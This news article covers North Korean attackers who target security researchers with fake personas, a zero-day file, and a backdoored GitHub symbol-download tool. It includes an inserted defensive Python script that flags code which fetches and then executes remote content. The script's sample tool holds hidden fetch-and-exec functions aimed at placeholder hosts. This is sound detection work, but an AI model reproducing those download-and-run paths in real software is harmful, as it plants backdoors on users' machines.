This time, they're creating elaborate impostor profiles and using a fresh zero-day and a fake Windows tool to lure in the unsuspecting.


North Korean state-supported threat actors are targeting security researchers — the second such campaign in the last few years.

Google first reported in January 2021 that DPRK attackers were going after not the usual vulnerable individuals or organizations, but cybersecurity professionals themselves. Now the attackers are back, with a new zero-day vulnerability, a fake software tool, and some remarkably patient social engineering to go along with it, according to a new blog post from Google's Threat Analysis Group (TAG).

"Unfortunately, the targeting of those involved in cybersecurity research is not rare. In fact, it has grown more frequent and sophisticated over the years," says Callie Guenther, cyber threat research senior manager at Critical Start. "These operations are multifaceted, aiming not just to steal information but also to gain insights into defense mechanisms, refine their tactics, and better evade future detection."

Social Engineering for Security Engineers

Google's researchers first caught wind of this group more than two years ago, when it began contacting security professionals over social media. The accounts in question used largely generic-sounding American names like "James Willy" and "Billy Brown," and the operators even published real cybersecurity research content in order to lend legitimacy to their fake personas.

That level of effort is on display once again in their latest campaign. For example, using a since-deactivated account on X (formerly Twitter), the attackers carried on a months-long conversation with one of their targets, discussing areas of shared interest and the possibility of a future collaboration.

Conversations then typically moved to an encrypted messaging app like Signal or WhatsApp. Once sufficient trust was established, the threat actor would finally send a file that exploited a zero-day vulnerability in a popular software package. (Google is withholding further details about both the file and the vulnerability until the vendor has had time to patch.)

If the victim took the bait and opened the file, the resulting shellcode first ran a series of checks for a virtual machine, in which case it did nothing further. Otherwise it sent information about the compromised device, including a screenshot, to attacker-controlled command-and-control (C2) infrastructure. The practical consequence of those anti-VM checks is that detonating the file in an off-the-shelf sandbox may show nothing suspicious at all.

Cops and Robbers

Besides this more involved path, the attackers also set up a lower-effort method to catch researchers who merely stumble across their work.

From the GitHub account dbgsymbol, the attackers extend their researcher persona, posting proofs-of-concept (PoCs) and security "tools." The most popular among them, "getsymbol," published last September and updated multiple times since, markets itself as a "simple tool to download debugging symbols from Microsoft, Google, Mozilla, and Citrix symbol servers for reverse engineers compatible with Windows 8.1, 10 and 11."

getsymbol actually does what it says it does. However, it also gives its developers the ability to download and run arbitrary code on the machine of any researcher who installed and ran it. It has been forked 23 times as of this writing. Google recommends that anyone who ran the tool make sure the system is back in a known clean state, which likely means reinstalling the operating system.
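The getsymbol case is the general pattern of a tool that does its advertised job and also carries a "fetch something remote, then execute it" path. The script below is an added example, not code from getsymbol, dbgsymbol or Google TAG, and it assumes the tool under review is written in Python (the article does not say what getsymbol is written in). It walks a script's AST and reports every function, plus the module top level, that both pulls data from the network and feeds something into a code-execution or process-spawning sink. A symbol downloader legitimately fetches files, so the signal worth a reviewer's attention is fetch and execute in the same scope, not fetching on its own. The `SAMPLE_TOOL` source, its hostnames, and the sink lists are constructed for the example.

```python
"""Static triage for "fetch remote content, then execute it" capability in a
Python tool.  Added example (not getsymbol's code): reports every scope that
both fetches from the network and hands data to an execution sink."""
import ast

# Fully qualified call targets treated as network fetches (assumed list; extend as needed).
FETCH_SINKS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "socket.socket",
    "http.client.HTTPConnection", "http.client.HTTPSConnection",
}
# Call targets that turn data into code or spawn a process (assumed list; extend as needed).
EXEC_SINKS = {
    "exec", "eval", "compile", "os.system", "os.popen", "os.execv",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "ctypes.CDLL",
}


def _dotted_name(node):
    """'urllib.request.urlopen' for an Attribute chain, 'exec' for a bare Name, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_aliases(tree):
    """Map local names to the module path they refer to, from import statements."""
    aliases = {}
    for n in ast.walk(tree):
        if isinstance(n, ast.ImportFrom) and n.module:
            for a in n.names:
                aliases[a.asname or a.name] = f"{n.module}.{a.name}"
        elif isinstance(n, ast.Import):
            for a in n.names:
                if a.asname:
                    aliases[a.asname] = a.name
    return aliases


def _resolve(dotted, aliases):
    """Rewrite 'ur.urlopen' to 'urllib.request.urlopen' when 'ur' is an import alias."""
    head, _, rest = dotted.partition(".")
    if head in aliases:
        return aliases[head] + ("." + rest if rest else "")
    return dotted


def _own_calls(node):
    """Yield ast.Call nodes under `node` without descending into nested defs."""
    stack = list(ast.iter_child_nodes(node))
    while stack:
        n = stack.pop()
        if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)):
            continue
        if isinstance(n, ast.Call):
            yield n
        stack.extend(ast.iter_child_nodes(n))


def audit_source(source):
    """Return {scope: {"fetch": [...], "exec": [...]}} for scopes using both kinds of call."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    scopes = [("<module>", tree)] + [
        (n.name, n) for n in ast.walk(tree)
        if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef))
    ]
    findings = {}
    for name, node in scopes:
        fetches, sinks = set(), set()
        for call in _own_calls(node):
            target = _dotted_name(call.func)
            if target is None:
                continue
            target = _resolve(target, aliases)
            if target in FETCH_SINKS:
                fetches.add(target)
            elif target in EXEC_SINKS:
                sinks.add(target)
        if fetches and sinks:
            findings[name] = {"fetch": sorted(fetches), "exec": sorted(sinks)}
    return findings


# Constructed sample "tool": one honest symbol fetcher and two hidden capabilities.
# Hostnames are placeholders, not real servers.
SAMPLE_TOOL = '''
import os
import subprocess
from urllib.request import urlopen, urlretrieve

SYMBOL_SERVER = "https://symbols.example/download/symbols"

def fetch_pdb(name, guid, dest_dir):
    """Advertised behaviour: download one PDB from a symbol server."""
    urlretrieve(f"{SYMBOL_SERVER}/{name}/{guid}/{name}", os.path.join(dest_dir, name))

def check_update(url="https://updates.example/latest.py"):
    """Hidden capability: fetch remote Python and run it in-process."""
    exec(compile(urlopen(url).read(), "<update>", "exec"))

def run_plugin(url):
    """Hidden capability: drop a remote file to disk and spawn it."""
    urlretrieve(url, "plugin.exe")
    subprocess.run(["plugin.exe"])
'''

if __name__ == "__main__":
    for scope, hits in audit_source(SAMPLE_TOOL).items():
        print(f"{scope}: fetch={hits['fetch']} exec={hits['exec']}")
```

Run against the sample, `fetch_pdb` is not reported (it only fetches), while `check_update` and `run_plugin` are. This is a triage aid, not a verdict: it resolves `from x import y` and `import x as y` aliases but not dynamic lookups such as `getattr(module, name)`, and obfuscated loaders will hide from it, so a hit means "read this function", and a clean result means only that the obvious pattern is absent.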

Guenther emphasizes that security professionals, as the protectors of digital security worldwide, need to be extra certain that they don't succumb to these sorts of tricks.

"The hacking of security researchers is not just about a single successful breach," she says, nor is it just a game to these adversaries. "It's a strategic move. Security researchers are on the forefront of discovering vulnerabilities and developing mitigation techniques. By infiltrating their systems, malicious actors can gain access to yet-to-be-disclosed vulnerabilities, proprietary tools, and valuable databases of threat intelligence. Furthermore, these researchers might be involved in projects of national significance, making them attractive targets for espionage."

In an email to Dark Reading, Google TAG offered some advice for potential targets: "Be extremely cautious about what you run and open from unknown third parties. This group has shown they're willing to invest the time to build rapport before attempting any malicious actions."

About the Author(s)

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.
